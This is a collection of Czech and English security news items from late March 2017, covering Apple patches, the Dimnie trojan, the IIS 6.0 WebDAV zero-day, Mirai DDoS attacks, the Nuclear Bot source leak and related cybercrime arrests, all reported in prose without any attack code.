Jak již samotný název napovídá, s updatem se americký softwarový gigant zaměří především na kreativce. „Aktualizace je navržena tak, aby podpořila kreativitu a pomohla uskutečnit vaše nápady pomocí nástrojů, které budou od 11. dubna nedílnou součástí Windows 10,“ lákají na nové funkce zástupci Microsoftu.

3D technologie a hráči
Americký softwarový gigant se s novou aktualizací zaměří především na dovednosti operačního systému Windows 10 v oblasti 3D technologií. Například malování bude přepracováno tak, aby v něm bylo možné snadno vytvářet trojrozměrné objekty. Kreativních nástrojů ale bude samozřejmě k dispozici daleko více.

Pozornost byla v aktualizaci věnována také hráčům. Své zápolení s protivníky budou uživatelé moci například snadno streamovat na internet. Jednoduše by mělo být možné vytvářet turnaje, a to doslova na pár kliknutí. Turnaje bude možné vytvářet prostřednictvím funkce Arena. V ní si uživatelé nastaví vlastní pravidla a určí, kdo přesně může hrát.

Další vylepšení by se měla týkat prohlížeče Microsoft Edge. A stranou nezůstane ani oblast zabezpečení a ochrany soukromí.

Druhá velká aktualizace
Server Ars Technica upozornil na to, že Microsoft chystá na letošní rok kromě Creators updatu ještě další velkou aktualizaci. Redaktoři se totiž dostali k plánům amerického podniku, ze kterých to jednoznačně vyplývá.

Přesné datum sice uvedeno nebylo, z plánů je však patrné, že by update měl být uvolněn během letošního podzimu. Otazník však visí nad tím, jaké nové vychytávky by měla druhé velká aktualizace přinést.


Apple záplatuje přes 200 bezpečnostních chyb

31.3.2017 Novinky/Bezpečnost Apple
Počítače s logem nakousnutého jablka, smartphony, ale například i chytré hodinky. Aktuálně prakticky neexistuje produkt od společnosti Apple, jehož software by neobsahoval nějakou bezpečnostní chybu. Americký počítačový gigant totiž naráz záplatuje více než dvě stovky trhlin.
Stroje s logem nakousnutého jablka jsou zpravidla považovány za ty bezpečnější. A v porovnání s celou řadou konkurentů to skutečně zpravidla platí.

Nicméně aktuálně se nashromáždilo v softwarových produktech amerického počítačového gigantu tolik chyb, že jde o naprostý rekord – jak bylo uvedeno již výše, je jich více než 200.

V ohrožení i uživatelé Windows
Trhliny obsahuje operační systém iOS pro chytré telefony iPhone a multimediální přehrávač iPod, ale stejně tak i jeho desktopová obdoba macOS, kterou využívají zase stolní počítače a notebooky s logem nakousnutého jablka.

Chyby byly dále odhaleny v platformě watchOS pro chytré hodinky a tvOS pro televizní systémy. Opravám se nevyhnul ani profesionální systém macOS Server či kancelářský balík Pages.

Hrozba se navíc týká také uživatelů, kteří žádné zařízení s platformou od Applu nevlastní. Trhliny obsahuje totiž například i webový prohlížeč Safari, jenž je dostupný i pro stroje s Windows. S ohledem na množství objevených zranitelností by uživatelé zcela jistě neměli s instalací aktualizací otálet.

Kyberzločinci již chyby zneužívají
V některých případech totiž již útočníci chyby zneužívají, jak upozornil Národní bezpečnostní tým CSIRT.CZ. „Verze iOS 10.3 pak opravuje zranitelnost, která je již aktivně využívána v rámci vyděračské kampaně založené na využití javascriptu,“ varoval Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

„Při ní se uživateli zobrazí informace, že jeho prohlížeč Safari byl zablokován s tím, že za jeho odblokování musí zaplatit,“ doplnil Bašta.


Pro-ISIS Amaq News Site Hacked and exploited to distribute Malware
31.3.2017 securityaffairs CyberCrime

The Islamic State-affiliated Amaq news agency has been hacked and used to spread a malicious a FlashPlayer file. Who is behind the attack?
The Islamic State-affiliated Amaq news agency has been hacked and used to spread a malware. The website is considered as the official news site of the Islamic State, it was used for propaganda and to share news related to the activities of the radical group.

The Amaq news agency warned that visitors were being prompted to download malicious a FlashPlayer file.

Just before the website was shut down, the Amaq agency released an official statement warning that Amaq’s latest domain was hacked. It is currently offline.

Amaq news Agency hacked

“The attack appears to have specifically targeted Amaq after pinning down a specific vulnerability, which indicates a more targeted attack rather than a random one,” Laith Alkhouri, Director of Research & Analysis for the Middle East and North Africa and a co-founder at cyber intelligence firm Flashpoint, told SecurityWeek. “The file might have aimed to infect machines in order to track the individuals who download the allegedly infected file rather than just merely damage their machines. The likelihood is that this attack, if ascertained, was not financially motivated.”

The Amaq news agency continues to change the domain due to the takedown of international law enforcement agencies.

At the time I was writing there is no attribution of the attack, the Amaq news agency is known to be a target of intelligence agencies worldwide, including the U.S. Cyber Command (CYBERCOM).

In March 2016, Senior Pentagon officials revealed the military’s first use of cyber warfare operations against the ISIL terrorist group.

The US military has started launching cyber attacks against members of the terrorist organization ISIS as part of the operation conducted to take back the Iraqi city of Mosul.

We cannot exclude that the attack is part of a cyber operation conducted by anti-ISIS groups.

In June 2016, ISIS warned its supporters that a fake version of an Amaq News Agency Android mobile app was being used to track them.

According to the experts, the cyber capabilities of the Islamic State are still relatively poor, but we cannot underestimate its growth.

During the past two years the cyber capabilities of the ISIS groups have been growing, at least five different pro-ISIS hacking group launched cyber-attacks in favor of the Islamic State.
According to techworm, on April 4, 2016, Cyber Caliphate Army (CCA), ISIS’s main hacking unit, and other pro-ISIS groups like the Sons Caliphate Army (SCA) and Kalacnikov.TN (KTN) merged and formed The United Cyber Caliphate (UCC). These pro-ISIS activities are still poorly organized and likely under-resourced and have not been either officially acknowledged nor claimed by ISIS itself.

Most of the claimed attacks by the pro-ISIS hackers are beginner level and opportunistic such as exploiting known vulnerabilities to compromise websites. These pro-ISIS actors have launched attacks chiefly on government, banking, and media targets, so far, but researchers at Flashpoint expect as growing to maturity, they keep targeting financial institution.


President Donald Trump is going to extend by one year the Executive Order 13694
31.3.2017 securityaffairs BigBrothers

US President Trump is extending by one year special powers introduced by President Obama with the Executive Order 13694 on cyber security.
The US President Donald Trump intends to extend by one year the Executive Order 13694 that gives the US Governments special powers to issue sanctions against people and organizations engaged in significant cyberattacks and cybercrime against the U.S.

The Executive Order 13694 was introduced by former President Barack Obama on April 1, 2015, and was due to expire next Saturday. President Trump sent a letter to Congress yesterday informing it of his decision to keep it active the Order.

“Significant malicious cyber-enabled activities originating from, or directed by persons located, in whole or in substantial part, outside the United States, continue to pose an unusual and extraordinary threat to the national security, foreign policy, and economy of the United States,” Trump wrote in the letter. “Therefore, I have determined that it is necessary to continue the national emergency declared in Executive Order 13694 with respect to significant malicious cyber-enabled activities.”

The executive order gave the U.S. new powers to retaliate for hacking against the critical infrastructure, political institutions, and US organizations.

Due to the attacks on the 2016 Presidential election, the US Government expanded the executive order in December 2016 to include voting systems and US political parties.

In December, the Order was used to sanction Russian agents and organizations for their alleged role in the cyber attacks on the Presidential Election.

The US ejected 35 Russian intelligence operatives from the United States and imposed sanctions on nine entities and individuals.

The Russians individuals ejected by the US Government are working out of the Russia’s consulate in San Francisco and the Russian embassy in Washington.

According to a White House fact sheet issued on the executive order, the individuals due to the “harassment of our diplomatic personnel in Russia by security personnel and police.”

Executive Order 13694 Trump

The US Government sanctioned the Russian intelligence services, the GRU (Russian Main Intelligence Directorate) and the FSB (Federal Security Service), four GRU officers, and three other organizations. The actions are the Obama administration’s response to a Russian hacking and disinformation campaign used to interfere in the American election process.

The order was issued concurrently a report from US intelligence that confirms the cyber attacks against the 2015 Presidential election aimed to influence the results of the vote.

The decision to extend the existing executive order is one of the first actions the Trump Administration has taken to approach cyber security issues.

One of the issues explicitly requested in the order is a close collaboration between the Department of Commerce and Department of Defense aimed at the protection of the critical infrastructure.


Verizon to pre-install a 'Spyware' app on its Android phones to collect user data
31.3.2017 thehackernews Android

If the death of online privacy rules wasn't enough for Internet Service Providers and advertisers to celebrate, Verizon has planned to pre-install spyware on customers' Android devices in order to collect their personal data.
The telecom giant has partnered with Evie Launcher to bring a new application called 'AppFlash' — a universal search bar that will come pre-installed on the home screens of all Verizon Android handsets for quickly finding apps and web content.
AppFlash is simply a Google search bar replacement, but instead of collecting and sending telemetry data including what you search, handset, apps and other online activities to Google, it will send to Verizon.
What's worse? Just like other pre-installed bloatware apps, Android users can't uninstall AppFlash quickly, unless they have rooted their phone.
AppFlash allows you to search inside apps or browse through listings of nearby restaurants and entertainment. The built-in Google Search can also do all these stuff. So, there's nothing this app does that a Google search can’t.
Then what's the need for this app? Of course, selling your data to advertisers or other big data companies and make money — thanks to the US Senate that allowed ISPs to collect and sell your data without permission and banned the FCC from ever passing any rule that would limit these powers.
Here's what the privacy policy of AppFlash reads:
We collect information about your device and your use of the AppFlash services. This information includes your mobile number, device identifiers, device type and operating system, and information about the AppFlash features and services you use and your interactions with them.
We also access information about the list of apps you have on your device. With your permission, AppFlash also collects information about your device’s precise location from your device operating system as well as contact information you store on your device.
AppFlash information may be shared within the Verizon family of companies, including companies like AOL who may use it to help provide more relevant advertising within the AppFlash experiences and in other places, including non-Verizon sites, services, and devices.
What's more? There is a 'Suggested Apps' section on the AppFlash main screen, which means that those apps have paid Verizon a good price to list on the main screen.
How to Get Rid of ‘AppFlash’ on Your Verizon Android Phone
Users can get rid of this bloatware in two ways: you can either root your device and remove the app in question, or only disable the app.
1. Root to remove AppFlash from Android: Since the company has made AppFlash a default app on the home screen of its Android handsets to help users search content and browse the internet, the app can not be uninstalled.
So, in order to uninstall AppFlash, you are required to root your Android device and then delete the app from your storage memory.
2. Disable AppFlash without Root: Since rooting is a dangerous process that void your device warranty, you can simply disable AppFlash.
Disabling bloatware apps on newer phones is easy, as Android has a built-in way to do this, which doesn't require any root access.
Just head on to Settings → Apps (or 'Applications' on some phones) → AppFlash. Now open it and click 'Disable,' 'Force Stop' and then 'Clear Data' as well.


Energetické sítě mají problémy s detekcí kyberútoků, tvrdí experti

31.3.2017 SecurityWorld ICS
Podle expertů firmy Kaspersky Lab nemají energetické sítě dostatečně silné vestavěné kyberbezpečnostní funkce, takže jsou velmi náchylné k sofistikovanějším bezpečnostním hrozbám, jejichž zjištění nebývá triviální.

Podle firmy Kaspersky Lab jsou současné elektrické rozvodové sítě spletitým systémem s integrovanou automatizací a kontrolními funkcemi – a protože komunikace probíhá skrz otevřené protokoly a síť nemá dostatečně silné vestavěné kyberbezpečnostní funkce, jsou tak velmi náchylné k sofistikovanějším bezpečnostním hrozbám.

Podle průzkumu 92 % průmyslových kontrolních systémů (ICS) s externím přístupem používá otevřené a nezabezpečené internetové komunikační protokoly. Navíc od roku 2010 se zvýšil počet zranitelných komponentů ICS o faktorovou jednotku 10, což z těchto zařízení činí snadné a lukrativní cíle pro kyberzločince.

Téměř polovina energetických a dalších společností z oblasti inženýrských sítí prý připouští, že mají velké problémy s detekcí sofistikovaných útoků.

Jedním z řešení má podle firmy Kaspersky být nasazení Industrial CyberSecurity for Energy, balíčku řešení pro subjekty působící v energetickém průmyslu. Tato sada podle výrobce chrání kontrolní centra na úrovni SCADA a automatické transformační systémy (Substation Automation Systems) na všech úrovních včetně horní úrovně automatizace, kam spadají servery, HMI, gateways nebo inženýrské pracovní stanice.

Chráněné jsou také sekundární automatizační zařízení: ochranná relé, bay controllers, fúzní jednotky, RTU a další transformační stanice, procesní IED stanice a celá síťová infrastruktura.

Řešení také nabízí řadu pokročilých technologií pro ochranu průmyslových uzlů a síťové infrastruktury. V rámci síťové infrastruktury nabízí řešení síťový monitoring a kontrolu integrity s možností „deep application protocol inspection“ (včetně IEC 60870-5-104, IEC 61850 a dalších norem a protokolů vztahujících se k elektrické infrastruktuře).


Widespread Email Scam Targets Github Developers with Dimnie Trojan
30.3.2017 thehackernews Virus


Open source developers who use the popular code-sharing site GitHub were put on alert after the discovery of a phishing email campaign that attempts to infect their computers with an advanced malware trojan.
Dubbed Dimnie, the reconnaissance and espionage trojan has the ability to harvest credentials, download sensitive files, take screenshots, log keystrokes on 32-bit and 64-bit architectures, download additional malware on infected systems, and self-destruct when ordered to.
The malware has largely flown under the radar for the past three years – Thanks to its stealthy command and control methods.
The threat was discovered in the mid of January this year when it was targeting multiple owners of Github repositories via phishing emails, but cyber-security firm Palo Alto, who reported the campaign on Tuesday, says the attacks started a few weeks before.
Here's How the Attack Works:
The attack starts by spamming the email inboxes of active GitHub users with booby-trapped job offers. The messages used in this campaign attempt to trick the victims into running an attached malicious .doc file.
The doc file contains embedded macro code, which if allowed, executes a PowerShell command to download and install the Dimnie trojan – malware that can be controlled remotely, enabling attackers to hijack infected PCs and install additional malware.
Dimnie is not new; it first appeared in early 2014, but the use of stealthy command and control (C&C) methods in the new version of the Dimnie malware helped the threat remain unnoticed until this year.
Dimnie's Stealthy Features let it went Undetected for 3 Years
This new iteration has the ability to hide its malicious traffic under fake domains and DNS requests. To camouflage its connection, Dimnie uses HTTP Proxy requests that appear to be sent to Google-owned domains, but it's actually talking to an address controlled by the attackers, which has nothing to do with Google.
For more stealthiness, the malware encrypts all of its modules during transit, and once they are received and decrypted on the targeted computer, they are never written to or executed on its hard drive.
Instead, Dimnie injects them directly into the memory of core Windows processes, which then execute in the OS memory itself, without leaving its traces on the user's disks. This lets Dimnie operators inject their malicious module into the process of any legit application.
"The global reach of the January 2017 campaign which we analyzed in this post is a marked departure from previous Dimnie targeting tactics. Multiple factors have contributed to Dimnie's relatively long-lived existence," Palo researchers concluded.
"By masking upload and download network traffic as innocuous user activity, Dimnie has taken advantage of defenders’ assumptions about what normal traffic looks like. This blending in tactic, combined with a prior penchant for targeting systems used by Russian speakers, likely allowed Dimnie to remain relatively unknown."
Since the malware hides its communications behind regular traffic and executes in the OS memory, Palo researchers unable to speculate the attackers behind the latest phishing email campaign or their exact motivations to target open-source developers.
However, gaining access to computers belonging to owners of private GitHub repositories gives attackers a way to access the source code of the application they manage for their organizations, which let the attackers gain access to the internal networks of various organizations.


Audit Finds Over a Dozen NTP Vulnerabilities

30.3.2017 securityweek  Vulnerebility

Researchers at Germany-based security firm Cure53 have conducted a 32-day audit of the Network Time Protocol (NTP) and the NTPsec project and discovered more than a dozen vulnerabilities.

Experts identified a total of 16 security-related issues, including 8 weaknesses that only affect NTP and two that only impact NTPsec, which is meant to be a secure, hardened and improved implementation of NTP. Cure53 has published separate reports focusing on the NTP and NTPsec problems.

The Network Time Foundation addressed the flaws earlier this month with the release of ntp-4.2.8p10.

Cure53 has classified one vulnerability as being critical. CVE-2017-6460, which only affects NTP, has been described as a stack-based buffer overflow that can be triggered by a malicious server when a client requests the restriction list. The flaw can be exploited to cause a crash and possibly to execute arbitrary code.

The security holes rated by Cure53 as high severity are CVE-2017-6463 and CVE-2017-6464, both of which can be exploited for DoS attacks.

It’s worth noting that while some of the vulnerabilities have been classified as critical and high severity by Cure53, NTP developers have only assigned medium, low and informational-level severity ratings to the discovered flaws.

Ntp-4.2.8p10 patches a total of 15 vulnerabilities and also includes just as many non-security fixes and improvements. Of the 15 security holes resolved in the latest version, 14 were discovered by Cure53, which also noticed that a flaw initially patched in December 2014 was reintroduced in November 2016.

One of the vulnerabilities fixed in ntp-4.2.8p10 was reported by researchers at Cisco Talos. Experts identified a DoS vulnerability affecting the origin timestamp check functionality. The company has published a blog post and a technical advisory describing the issue.

This is not the only audit conducted recently by Cure53. In the past months, the company also analyzed the cURL data transfer tool and the Dovecot email server.


iOS Scareware Campaign Abuses Safari Vulnerability

30.3.2017 securityweek iOS 
One of the vulnerabilities addressed by Apple this week with the release of iOS 10.3 has been being abused by scammers to execute a scareware campaign, Lookout researchers warn.

The mobile security firm discovered that cybercriminals were abusing the handling of pop-up dialogs in Mobile Safari in a way that allowed them to lock victims out of the browser. Attackers extorted money from their victims, demanding iTunes Gift Cards and were displaying threatening messages to the victims, in an attempt to scare them into paying.

The issue, Lookout explains, was that the manner in which Mobile Safari was handling website pop-up dialogues affected the entire application rather than only the tab in which the site was opened. Starting with iOS 10.3, these dialogues can no longer affect the entire app.

By blocking the browser, the attackers were attempting to scare users into believing their data has been encrypted, but the attack could be easily thwarted. Any knowledgeable user could simply head to the iOS settings and clear the browser’s cache to restore functionality.

Conducted via several related websites, the attack was discovered last month, when a user reported losing control of Safari after visiting a web page. An overlaid “Cannot Open Page” dialog from Safari prompted the user to tap OK, but the dialogue would reappear in an infinitive loop. A “Your device has been locked…” also appeared.

The attack was contained within the app sandbox and no exploit code was being used, but attackers effectively abused fear as the main factor of convincing victims to pay before they realized there was no actual risk.

“The scammers registered domains and launched the attack from the domains they owned, such as police-pay[.]com, which the attackers apparently named with the intent of scaring users looking for certain types of material on the Internet into paying money. Examples range from pornography to music-oriented websites,” the researchers explain.

Lookout determined that the attack appears to have been developed for older versions of iOS, but the abuse of pop-ups in Mobile Safari was still possible until iOS 10.3. Apple has patched the issue in a way that prevents similar pop-ups from blocking the entire application. This means that users can now close a tab that is misbehaving.

The security content of iOS 10.3 included patches for 83 other vulnerabilities. Additionally, Apple patched flaws in macOS, watchOS, tvOS, Safari, and various macOS and iOS software.


Are you searching for stolen US University email credentials? Search on the Dark Web
30.3.2017 securityaffairs Crime

According to a new research published by the nonprofit DCA, millions of stolen US University email credentials are available for sale on the Dark Web.
According to a new research published by the nonprofit Digital Citizens Alliance (DCA) that searched the Dark Web for credentials from the top 300 US universities, millions of stolen email credentials are available for sale.
Stolen email credentials from the largest US universities are a precious commodity in the dark web, crooks are offering them for a price ranging from $3.50 to $10 apiece.

The researchers, supported by a research firm ID Agent, found 13,930,176 credentials from those big schools, mostly from the University of Michigan (122,556), Penn State (119,350), University of Minnesota (117,604), Michigan State (115,973), and Ohio State (114,032).

DCA university credentials dark web

The MIT is the institute with the highest ratio of stolen and spoofed email addresses to number of enrolled and staff, 2.81:1, followed by Carnegie Mellon University, 2.4:1, and the Cornell University, 2.39:1.

“I’ve been scraping the Dark Web since 2009. There were 2.2 million .edu [emails] there back in 2015, 2.8 million in 2016, and now almost 14 million a year later. That’s a significant spike,” explained Brian Dunn, managing partner at ID Agent.

According to the researchers, the huge amount of stolen records was obtained through third-party website breaches, and during 2016 the number of data breaches was very high.

“There have been significant third-party breaches in 2016,” said Dunn. ID Agent observed a 547% increase in all types of stolen credentials offered for sale in the Dark Web over the past three years.

According to the DCA, the report only analyzed credentials belonging to the major US universities, this means that there is the possibility that in the dark net sellers are offering credentials for other smaller universities.

“[The] .edu [domain] is a generally valuable email domain just like .gov and .mil,” Dunn concluded.


Nuclear Bot source code leaked online, a new threat will rapidly spread in the wild
30.3.2017 securityaffairs BotNet

The source code for a new banking Trojan dubbed Nuclear Bot was leaked online, experts speculate a rapid diffusion of the threat in the wild.
The source code for a new banking Trojan, dubbed Nuclear Bot, is available for sale in the cyber criminal underground.The Nuclear Bot banking Trojan first appeared in the cybercrime forums in early December when it was offered for $2,500. The malicious code implements features commonly seen in banking Trojans, it is able to inject code in Mozilla Firefox, Internet Explorer and Google Chrome browsers and steal sentitive data provided by the users.“In early December 2016, IBM X-Force researchers noticed the emergence of a new banking malware advertised for sale in a few underground boards.” reads a blog post published by IBM researchers who are following the evolution of the threat. “The malware’s vendor, who went by the online moniker Gosya, was a Russian-speaking member who introduced himself as the developer of Nuclear Bot, or NukeBot, a modular banking Trojan.”
The Trojan can also open a local proxy or hidden remote desktop service to allow crooks to initiate rogue transactions through the victims’ browsers after they have been tricked into providing the second authentication factor.

Nuclear Bot Banking

According to IBM, the creator of the malware has lost his credibility over the months and has been flagged as a scammer in the hacking community. The malware author did not offer a test version of the malware to potential buyers and advertised the Nuclear Bot using different names on different cybercrime forums.

In order to gain credibility and notoriety in the cyber crime community the author of the malware decided on releasing the Trojan’s source code.

The release of malicious code online represents an important milestone in the malware life cycle because give the opportunity to oder malware developers and crime organizations to customize and distribute their own version of the malware.

The NukeBot Trojan appears as a powerful tool written from scratch and that was able in early stage attacks to avoid detection of antivirus solutions.

“We know from previous incidents, such as the Zeus, Gozi and Carberp leaks, that publicly available source code makes for more malware. This is often incorporated into existing projects. X-Force researchers noted that NukeBot is likely to see the same process take place in the wild, especially since its code is not copied from other leaked malware, per the developer’s claims.” continues IBM.

“At this time, NukeBot has not been detected in real-world attacks and does not have defined target lists.”

Security experts expect a growing number of players in cybercrime underground will start to offer the NukeBot Trojan through the consolidated model of sale known as malware-as-a-service.


Over 8.3 million live websites using IIS 6.0 are affected by a Zero-Day
30.3.2017 securityaffairs Vulnerebility

Millions of websites are affected by a buffer overflow zero-day vulnerability, tracked as CVE-2017-7269, that resides in the IIS 6.0.
The II6 6.0 zero-day flaw was discovered by two researchers with the Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China who published a PoC code exploit on GitHub.

Microsoft has already acknowledged the vulnerability that was exploited in the wild in July or August 2016.

More than 8 million websites could be affected by the flaw that resides in the ScStoragePathFromUrl function of the Web Distributed Authoring and Versioning (WebDAV) service in Windows Server 2003 R2’s IIS 6.0.

The issue is caused by the improper validation of an ‘IF’ header in a PROPFIND request and could allow an attacker to trigger a denial of service condition or to run arbitrary code.

“Microsoft Internet Information Services (IIS) 6.0 is vulnerable to a zero-day Buffer Overflow vulnerability (CVE-2017-7269) due to an improper validation of an ‘IF’ header in a PROPFIND request.” reads the analysis published by Trend Micro.

IIS 6.0 flaw

“A remote attacker could exploit this vulnerability in the IIS WebDAV Component with a crafted request using PROPFIND method. Successful exploitation could result in denial of service condition or arbitrary code execution in the context of the user running the application.”

The Web Distributed Authoring and Versioning (WebDAV) extension of the HTTP protocol allows clients to perform remote Web content authoring operations. It allows to extend the support HTTP methods, including COPY, LOCK, MKCOL, PROPFIND, and UNLOCK.

“This vulnerability is exploited using the PROPFIND method and IF header. The PROPFIND method retrieves properties defined on the resource identified by the Request-URI. All the WebDAV-Compliant resources must support the PROPFIND method.” continues the analysis.

The impact of this vulnerability is wide, according to data provided by the W3Techs, Microsoft’s IIS is currently the third most popular web server solution in the wild (11.4% of all websites). IIS 6.0 accounts for 11.3%, roughly 1.3% of all websites on the Internet.

The vulnerability doesn’t affect newer versions of Microsoft Internet Information Services.

According to BuiltWith, IS 6.0 version is currently used by 2.3% of the entire Internet, over 8.3 million live websites are using IIS 6.0.

In order to mitigate the risk of cyber attacks, it is possible to disable the WebDAV service on IIS 6.0 installations.

“To mitigate the risk, disabling the WebDAV service on the vulnerable IIS 6.0 installation is recommended. Newer versions of Windows Server shipped with newer versions of IIS are not affected by this vulnerability.” concluded Trend Micro.


Imperva observed a new variant of the Mirai botnet unleashes 54-Hour DDoS attack
30.3.2017 securityaffairs Attack

According to security experts at Imperva, a newly discovered variant of the Mirai botnet was used to power a 54-hour DDoS attack.
According to security experts at Imperva, a newly discovered variant of the dreaded Mirai botnet was used to power a 54-hour distributed denial of service (DDoS) attack.

The new variant of the Mirai botnet was observed targeting a customer of the company, a US college. The DDoS attack peaked at around 37,000 RPS, the experts highlighted that this is the highest of any Mirai botnet previously detected.

“The attack, which started on February 28 and ran for 54 hours straight, targeted one of our customers, a US college.” reads the blog post published by Incapsula.

“The average traffic flow came in at over 30,000 RPS and peaked at around 37,000 RPS—the most we’ve seen out of any Mirai botnet. In total, the attack generated over 2.8 billion requests.”

Mirai botnet traffic

The Mirai malware was spotted by the researcher MalwareMustDie in August 2016, it was specifically designed to target IoT devices.

It infected thousands of routers and IoT devices, including DVRs and CCTV system). When the Mirai bot infects a device, it chooses random IPs and attempts to log via the Telnet and SSH port using a list of admin credentials.

The Mirai botnet was used last year in two large attacks against the website of the popular investigator Brian Krebs and the Dyn DNS service. In October, the source of the Mirai bot was leaked online and new variants were spotted in the wild.

A reference to the malicious code was spotted by Brian Krebs on the popular criminal hacker forum Hackforum. The Hackforum user with moniker “Anna-senpai” shared the link to the source code of the malware “Mirai.”

On January 2017, experts spotted a new Windows variant of Mirai allegedly used to spread the Linux Trojan to more IoT devices.

The experts at Imperva speculate the attack was powered by a variant developed from the source code leaked. Previous versions of the Mirai botnet powered network layer DDoS attacks, the new variant launched an application layer assaults instead.

The experts determined that the botnet used to launch the attack was mostly composed of CCTV cameras, DVRs and routers. The researchers speculate the IoT devices might have been compromised by exploiting known vulnerabilities that the botnet exploited via open telnet (23) ports and TR-069 (7547) ports.

“Based on a number of signature factors, including header order, header values and traffic sources, our client classification system immediately identified that the attack emerged from a Mirai-powered botnet,” continues the blog post published by Imperva.

The DDoS bots used in the attack used different user-agents instead the five previously seen hardcoded in the default Mirai version. The technical detail suggests the new variant of the Mirai botnet might have been improved to power more sophisticated application layer attacks.

“Overall, in the course of the attack, we spotted the following 30 user-agent variants” continued the post.

The analysis of the traffic originating from 9,793 IPs worldwide, revealed that more than 70% of the devices were located in the following countries: United States (18.4%), Israel (11.3%), Taiwan (10.8%), India (8.7%), Turkey (6%), Russia (3.8%), Italy (3.2%), Mexico (3.2%), Colombia (3.0%), and Bulgaria (2.2%).

“Less than a day after the initial assault ended, another one began that lasted for an hour and a half with an average traffic flow of 15,000 RPS. Based on our experience, we expect to see several more bursts before the offender(s) finally give up on their efforts,” concluded the post.


Millions of Websites Affected by IIS 6.0 Zero-Day

29.3.2017 securityweek Vulnerebility
More than 8 million websites could be exposed to a buffer overflow vulnerability in Internet Information Services (IIS) 6.0 that has been exploited in the wild since July 2016, researchers warn.

The bug was found in the ScStoragePathFromUrl function of the Web Distributed Authoring and Versioning (WebDAV) service in Windows Server 2003 R2’s IIS 6.0. The issue, tracked as CVE-2017-7269, resides in the improper validation of an ‘IF’ header in a PROPFIND request and could allow an attacker to cause denial of service or to run arbitrary code.

Discovered by two researchers with the Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China, the vulnerability was exploited in the wild in July or August 2016. This week, the researchers published a proof-of-concept on GitHub and revealed that Microsoft has already acknowledged the bug.

The WebDAV extension of the HTTP protocol allows clients to perform remote Web content authoring operations, offering support for new HTTP methods, including COPY, LOCK, MKCOL, PROPFIND, and UNLOCK.

The exploit abuses the PROPFIND method and IF header. The former, Trend Micro’s Virendra Bisht explains, “retrieves properties defined on the resource identified by the Request-URI” and is supported by all WebDAV-Compliant resources, while the latter “handles the state token as well as the ETags.”

According to Bisht, “the vulnerability could be exploited with an overly large ‘IF’ header in the ‘PROPFIND’ request with at least two http resource in the IF header.” The researcher also explains that, while successful attacks could lead to remote code execution, unsuccessful attacks could sometimes lead to denial of service conditions.

Data from W3Techs reveals that Microsoft’s IIS is currently the third most popular web server technology out there, powering 11.4% of all websites. While newer versions of Microsoft’s technology are more popular, IIS 6.0 still accounts for 11.3% of the IIS-powered websites, which results in 1.3% of all websites out there being powered by this version.

According to BuiltWith, however, IIS powers 13.8% of all live websites, while the IIS 6.0 version is used by 2.3% of the entire Internet. This means that over 8.3 million live websites are using IIS 6.0, including tens of thousands of the most popular sites out there. However, the number is constantly dropping.

Disabling the WebDAV service on the vulnerable IIS 6.0 installations can mitigate the risk posed by this vulnerability, Trend Micro’s researcher says. The flaw does not affect newer versions of IIS.

Because IIS 6.0 was included with Windows Server 2003, an old operating system version that is no longer supported by Microsoft, it’s unlikely that a patch will be released for this zero-day.

“Nobody should be running IIS 6 in 2017. This is unsupported and unsafe software and must be upgraded ASAP," Craig Young, Prinicpal Security Researcher for Tripwire, told SecurityWeek. "All vulnerabilities in this software are going to be zero-day forever and while there may be mitigations for this attack, it is incredibly risky to run obsolete software on the Internet.”


Police Arrest Man Potentially Linked to Group Threatening to Wipe Millions Of iPhones
29.3.2017 thehackernews  Apple
The British authority has reportedly arrested a 20-years-old young man – potentially one of the member of a cyber criminal gang 'Turkish Crime Family' who threatened Apple last week to remotely wipe data from millions of iOS devices unless Apple pays a ransom of $75,000.
The UK's National Crime Agency (NCA) arrested a young man from London on Tuesday on suspicion of "Computer Misuse Act and extortion offences," who according to Motherboard, "may be connected to the ongoing attempted extortion of Apple by a group calling itself the Turkish Crime Family."
Last week, the hacking group claimed to have access to over 300 million iCloud accounts and threatened Apple to remotely wipe data from those millions of Apple devices unless Apple pays it $75,000 in Bitcoin or Ethereum, or $100,000 worth of iTunes gift cards.
Motherboard broke the story after one of the members of Turkish Crime Family shared screenshots of emails between the hacking group and Apple's security team with the publication.
Shortly after the extortion news, Apple released a statement, saying that there have not been any breaches to its servers and databases; instead, the data in possession with hackers appears to be from previously compromised third-party services, such as LinkedIn.
The company also said it is working with law enforcement to identify the criminals.
"Apple is actively monitoring to prevent unauthorised access to user accounts and is working with law enforcement to identify the criminals involved," Apple said in the statement.
"To protect against these type of attacks, we always recommend that users always use strong passwords, not use those same passwords across sites and turn on two-factor authentication."
Although the NCA has not elaborated further about the arrest except that the man has been bailed pending further inquiries, another member of the same criminal gang confirmed Motherboard via an email that the arrested member hasn't been online after the alleged raid.
Moreover, the group claimed his friend who was at his house during the raid managed to film the incident, though Motherboard, who received a copy of it, has declined to post the video publicly at this time.
Arrest Doesn’t Mean Your iCloud Data is Safe
At this moment, we are not entirely sure that the arrested man is actually linked to the Turkish Crime Family, although the man is suspected of having committed blackmail and unauthorised access of computers with the intent to commit or facilitate the commission of further offences, according to the warrant Motherboard received in an email.
But if he comes out to be the member of the same hacking group, it doesn't mean that Apple extortion threat has gone completely, as other members of the hacking group are still out there with alleged compromised icloud accounts.
It's possible that remaining members of Turkish Crime Family, in panic, go underground without doing anything, but there's still the possibility of them remotely wiping victim's Apple devices and resetting iCloud accounts, if they actually have the capability to do what they claim.
The hacking group has given Apple a deadline until April 7 to pay up the ransom.
So, if you haven't done yet, change your iCloud passwords immediately and enable two-step authentication to add an extra layer of security to your account in order to keep your iCloud account safe from hackers.


Hacker Who Used Linux Botnet to Send Millions of Spam Emails Pleads Guilty
29.3.2017 thehackernews  BotNet
A Russian man accused of infecting tens of thousands of computer servers worldwide to generate millions in illicit profit has finally entered a guilty plea in the United States and is going to face sentencing in August.
Maxim Senakh, 41, of Velikii Novgorod, Russia, pleaded guilty in a US federal court on Tuesday for his role in the development and maintenance of the infamous Linux botnet known as Ebury that siphoned millions of dollars from victims worldwide.
Senakh, who was detained by Finland in August 2015 and extradition to the US in January 2016, admitted to installing Ebury malware on computer servers worldwide, including thousands in the United States.
First spotted in 2011, Ebury is an SSH backdoor Trojan for Linux and Unix-style operating systems, like FreeBSD or Solaris, which infected more than 500,000 computers and 25,000 dedicated servers in a worldwide malware campaign called 'Operation Windigo.'
